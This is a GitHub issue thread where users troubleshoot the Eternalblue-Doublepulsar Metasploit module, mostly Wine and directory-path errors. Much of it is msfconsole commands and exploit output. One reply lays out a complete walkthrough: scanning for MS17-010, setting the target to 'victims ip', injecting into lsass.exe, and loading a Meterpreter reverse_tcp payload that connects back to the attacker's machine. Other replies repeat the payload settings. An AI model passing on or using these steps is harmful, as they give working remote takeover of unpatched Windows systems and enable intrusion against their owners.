ghost
commented
7 years ago It's a wine problem try adjusting path and or upgrading wine
Open syrius01 opened 7 years ago
ghost
commented
7 years ago It's a wine problem try adjusting path and or upgrading wine
UrielRicardo
commented
7 years ago @syrius01 Just as you gave the command "set RHOST xxx.xxx.xxx.xx" run to the path of the deps directory: Example: "set eternalbluepath / root / xxxx / deps
Fighter19
commented
7 years ago You're using a 64 bit version of wine instead of using a 32 bit version.
LockGit
commented
7 years ago also have this problem , how to solve ?
root@kali:~# uname -ar Linux kali 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
root@kali:~# wine --version wine-1.7.33
LockGit
commented
7 years ago apt-get install winetricks , everything is fine !
LukeSynn
commented
7 years ago Got the same error running: Kali 4.9.0-kali3-amd64
Seems like wine32 was removed from the apt-get repository in recent Kali versions (2017), and even when a path is added, you receive the error:
The following packages have unmet dependencies: wine32:i386 : Depends: libc6:i386 (>= 2.17) but it is not installable Depends: libwine:i386 (= 1.8.7-2\~bpo8+1) but it is not going to be installed Recommends: wine:i386 (= 1.8.7-2\~bpo8+1) E: Unable to correct problems, you have held broken packages.
Any plans to make the .exe files available for wine 64-bit?
italy2010
commented
7 years ago i have this issue
msf exploit(eternalblue_doublepulsar) > exploit
[] Started reverse TCP handler on 192.168.226.130:4444 [] 1.1.1.1:445 - Generating Eternalblue XML data cp: cannot stat '/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.Skeleton.xml': No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory [] 1.1.1.1:445 - Generating Doublepulsar XML data cp: cannot stat '/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.Skeleton.xml': No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory [] 1.1.1.1:445 - Generating payload DLL for Doublepulsar [] 1.1.1.1:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 1.1.1.1:445 - Launching Eternalblue... sh: 1: cd: can't cd to /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps wine: cannot find L"C:\windows\system32\Eternalblue-2.2.0.exe" [-] 1.1.1.1:445 - Are you sure it's vulnerable? [] 1.1.1.1:445 - Launching Doublepulsar... sh: 1: cd: can't cd to /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps wine: cannot find L"C:\windows\system32\Doublepulsar-1.3.1.exe" [-] 1.1.1.1:445 - Oops, something was wrong! [] Exploit completed, but no session was created. msf exploit(eternalblue_doublepulsar) >
LockGit
commented
7 years ago @italy2010 show options , see dir .........
krishna1972
commented
7 years ago am the same as @italy2010, i have tried to change dir. fixed it
k1ng88
commented
7 years ago @krishna1972 how did you fix that? I am getting same error as @italy2010 Tried to move the Eternalblue-Doublepulsar-Metasploit/deps into other folder, but still not fixed.
krishna1972
commented
7 years ago ok so I changed /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps/Doublepulsar- al I needed because the eternalblue-doublepulsar file was in my downloads file(path) so /root/Downloads/Eternalblue-Doublepulsar/deps that is both paths. next i changed the processinject to lsass.exe because it is a x64, then the payload is payload windows/x64/meterpeter/reverse_tcp that was pretty much it. please let me know how you get on. thanks
LockGit
commented
7 years ago first: set correct file path,dir path, if file or dir path not exits , you can use mkdir command create it and move these file to you create dir !
I was successful !!!
krishna1972
commented
7 years ago Yep that's it
Sent from Krishna's iPhone 6s Plus
On 5/07/2017, at 1:56 PM, ↓↓↓↓↓↓↓↓↓↓ notifications@github.com wrote:
first: set correct file path,dir path, if file or dir path not exits , you can use mkdir command create it and move these file to you create dir !
if not work: Change: PROCESSINJECT wlms.exe/lsass.exe or other use exploit/windows/smb/eternalblue_doublepulsar set listen port(use multi/handler) set payload windows/x64/meterpreter/reverse_tcp (64bit) set payload windows/meterpreter/reverse_tcp (32bit) I was successful !!!
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or mute the thread.
k1ng88
commented
7 years ago have did that, and also follow based on this ref : http://www.hackingarticles.in/exploit-remote-windows-pc-eternalblue-doublepulsar-exploit-metasploit/
but somehow still getting same error
[] Started reverse TCP handler on 192.168.119.137:4444 [] 192.168.1.210:445 - Generating Eternalblue XML data cp: cannot stat '/root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.Skeleton.xml': No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Eternalblue-2.2.0.xml: No such file or directory [] 192.168.1.210:445 - Generating Doublepulsar XML data cp: cannot stat '/root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.Skeleton.xml': No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps/Doublepulsar-1.3.1.xml: No such file or directory [] 192.168.1.210:445 - Generating payload DLL for Doublepulsar [] 192.168.1.210:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.1.210:445 - Launching Eternalblue... sh: 1: cd: can't cd to /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps wine: cannot find L"C:\windows\system32\Eternalblue-2.2.0.exe" [-] 192.168.1.210:445 - Are you sure it's vulnerable? [] 192.168.1.210:445 - Launching Doublepulsar... sh: 1: cd: can't cd to /root/Desktop/Eternalblue_Doublepulsar-Metasploit/deps wine: cannot find L"C:\windows\system32\Doublepulsar-1.3.1.exe" [-] 192.168.1.210:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
krishna1972
commented
7 years ago 1st Go to your terminal then > service postgresql start 2nd Go to your foler where your eternalblue-doublepulsar is then go to deps in your eternalblue-doublepulsar 3 go and open msfconsole in another terminal msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(smb_ms17_010) > set RHOSTS victims ip RHOSTS => victims ip msf auxiliary(smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
RHOSTS victims ip yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(smb_ms17_010) > back msf > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue PROCESSINJECT wlms.exe yes Name of process to inject into (Change to lsass.exe for x64) RHOST yes The target address RPORT 445 yes The SMB service port (TCP) TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64) WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Exploit target:
Id Name
8 Windows 7 (all services pack) (x86) (x64) msf exploit(eternalblue_doublepulsar) > set DOUBLEPULSARPATH /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps DOUBLEPULSARPATH => /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps msf exploit(eternalblue_doublepulsar) > set ETERNALBLUEPATH /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps ETERNALBLUEPATH => /root/Downloads/Eternalblue-Doublepulsar-Metasploit/deps msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT lsass.exe PROCESSINJECT => lsass.exe msf exploit(eternalblue_doublepulsar) > set RHOSTvictims ip RHOST =>victims ip msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x64
msf exploit(eternalblue_doublepulsar) > show targets
Exploit targets:
Id Name
0 Windows XP (all services pack) (x86) (x64) 1 Windows Server 2003 SP0 (x86) 2 Windows Server 2003 SP1/SP2 (x86) 3 Windows Server 2003 (x64) 4 Windows Vista (x86) 5 Windows Vista (x64) 6 Windows Server 2008 (x86) 7 Windows Server 2008 R2 (x86) (x64) 8 Windows 7 (all services pack) (x86) (x64) msf exploit(eternalblue_doublepulsar) > set target 8 target => 8 msf exploit(eternalblue_doublepulsar) > set LHOST your ip LHOST => your ip msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(eternalblue_doublepulsar) > msf exploit(eternalblue_doublepulsar) > exploit
that is everything.
krishna1972
commented
7 years ago every step
k1ng88
commented
7 years ago @krishna1972 Ok i just follow through it. Previous error was gone, Thanks
[] Started reverse TCP handler on 192.168.119.137:4444 [] 192.168.1.210:445 - Generating Eternalblue XML data [] 192.168.1.210:445 - Generating Doublepulsar XML data [] 192.168.1.210:445 - Generating payload DLL for Doublepulsar [] 192.168.1.210:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.1.210:445 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 192.168.1.210:445 - Are you sure it's vulnerable? [] 192.168.1.210:445 - Launching Doublepulsar... [-] 192.168.1.210:445 - Oops, something was wrong! [] Exploit completed, but no session was created. msf exploit(eternalblue_doublepulsar) >
But come up with this error, I will try to use other target later and see the result.
Thanks again
adrianabadin
commented
6 years ago hello i cant make this work ive tryed everithing you mentioned above and i still get the following message [] Started reverse TCP handler on 192.168.0.13:4444 [] 192.168.1.16:445 - Generating Eternalblue XML data [] 192.168.1.16:445 - Generating Doublepulsar XML data [] 192.168.1.16:445 - Generating payload DLL for Doublepulsar [] 192.168.1.16:445 - Writing DLL in /home/orphan/.wine/drive_ceternal11.dll [] 192.168.1.16:445 - Launching Eternalblue... err:menubuilder:init_xdg error looking up the desktop directory fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000 [-] Error getting output back from Core; aborting... [-] 192.168.1.16:445 - Are you sure it's vulnerable? [] 192.168.1.16:445 - Launching Doublepulsar... fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000 [-] 192.168.1.16:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
what do i do wrong? THANKS
krishna1972
commented
6 years ago Where have you saved eternal blue-doublepulsar-Metasploit to?
On 3/02/2018, at 8:01 AM, GRAVEDDIGER notifications@github.com wrote:
hello i cant make this work ive tryed everithing you mentioned above and i still get the following message [] Started reverse TCP handler on 192.168.0.13:4444 [] 192.168.1.16:445 - Generating Eternalblue XML data [] 192.168.1.16:445 - Generating Doublepulsar XML data [] 192.168.1.16:445 - Generating payload DLL for Doublepulsar [] 192.168.1.16:445 - Writing DLL in /home/orphan/.wine/drive_ceternal11.dll [] 192.168.1.16:445 - Launching Eternalblue... err:menubuilder:init_xdg error looking up the desktop directory fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000 [-] Error getting output back from Core; aborting... [-] 192.168.1.16:445 - Are you sure it's vulnerable? [] 192.168.1.16:445 - Launching Doublepulsar... fixme:ntdll:find_reg_tz_info Can't find matching timezone information in the registry for bias 180, std (d/m/y): 0/00/0000, dlt (d/m/y): 0/00/0000 [-] 192.168.1.16:445 - Oops, something was wrong! [] Exploit completed, but no session was created.
what do i do wrong? THANKS
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/issues/4#issuecomment-362675023, or mute the thread https://github.com/notifications/unsubscribe-auth/AUK1igZFjrHQ_LNNcgaaL9co1xtbh3Bjks5tQ1uVgaJpZM4NKZAj.
adrianabadin
commented
6 years ago @krishna1972 thanks for your reply ive saved eternalblue in /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/deps and in /root/Eternalblue-Doublepulsar-Metasploit im runing backbox 5
krishna1972
commented
6 years ago Ok for starters I use kali Linux. Then I went to git hub and downloaded the eternalblue-doublepulsar Get rid of opt/././. Only use the root with deps at end.
Sent from Krishna's iPhone 6s Plus
On 6/02/2018, at 05:59, GRAVEDDIGER notifications@github.com wrote:
@krishna1972 thanks for your reply ive saved eternalblue in /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/deps and in /root/Eternalblue-Doublepulsar-Metasploit im runing backbox 5
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or mute the thread.
rlim0x61
commented
6 years ago I fixed this issue by adding to my kali support to both archs x86 and x64 and also by updating the system and getting wine32 installed. See below:
krishna1972
commented
5 years ago You need to be more specific, send your error messages.
[] Started reverse TCP handler on 192.168.1.150:4444 [] 192.168.1.31:445 - Generating Eternalblue XML data [] 192.168.1.31:445 - Generating Doublepulsar XML data [] 192.168.1.31:445 - Generating payload DLL for Doublepulsar [] 192.168.1.31:445 - Writing DLL in /root/.wine64/drive_c/eternal11.dll [] 192.168.1.31:445 - Launching Eternalblue... wine: Bad EXE format for Z:\opt\metasploit-framework\modules\exploits\windows\smb\Eternalblue-Doublepulsar-Metasploit\deps\Eternalblue-2.2.0.exe. [-] 192.168.1.31:445 - Are you sure it's vulnerable? [] 192.168.1.31:445 - Launching Doublepulsar... Application tried to create a window, but no driver could be loaded. Make sure that your X server is running and that $DISPLAY is set correctly. wine: Bad EXE format for Z:\opt\metasploit-framework\modules\exploits\windows\smb\Eternalblue-Doublepulsar-Metasploit\deps\Doublepulsar-1.3.1.exe. [-] 192.168.1.31:445 - Oops, something was wrong! [] Exploit completed, but no session was created.